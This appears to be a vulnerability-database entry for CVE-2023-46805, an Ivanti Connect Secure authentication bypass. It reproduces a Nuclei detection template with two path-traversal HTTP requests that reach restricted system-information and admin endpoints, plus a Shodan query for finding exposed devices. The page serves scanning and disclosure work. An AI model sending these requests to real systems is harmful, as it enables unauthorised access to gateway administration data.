Lucene search

ProjectDiscoveryNUCLEI:CVE-2023-46805

HistoryJan 16, 2024 - 6:36 p.m.

Ivanti ICS - Authentication Bypass

2024-01-1618:36:55

ProjectDiscovery

github.com

ivanti

authenticaton bypass

web component

vulnerability

remote attacker

control checks

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

9 High

AI Score

Confidence

High

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.973 High

EPSS

Percentile

99.9%

JSON

An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

id: CVE-2023-46805

info:
  name: Ivanti ICS - Authentication Bypass
  author: DhiyaneshDK,daffainfo,geeknik
  severity: high
  description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46805
    - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/H4lo/awesome-IoT-security-article
    - https://github.com/inguardians/ivanti-VPN-issues-2024-research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2023-46805
    cwe-id: CWE-287
    epss-score: 0.96274
    epss-percentile: 0.99497
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2023,kev,auth-bypass,ivanti

http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "build")'
          - 'contains(body_1, "system-information")'
          - 'contains(body_1, "software-inventory")'
          - 'contains(header_1, "application/json")'
        condition: and

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "poll_interval")'
          - 'contains(body_2, "block_message")'
          - 'contains(header_2, "application/json")'
        condition: and
# digest: 490a0046304402200ecd050c196cc17a960bbe78b7217a1d0bbdf94d05261a528f992427117b470002206a36cafa1a82caa7f5dcaf43f9abaa55438c280dbdb67df57eaab83abc12ebc2:922c64590222798bb761d5b6d8e72950

References

packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html

forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

github.com/H4lo/awesome-IoT-security-article

github.com/inguardians/ivanti-VPN-issues-2024-research

nvd.nist.gov/vuln/detail/CVE-2023-46805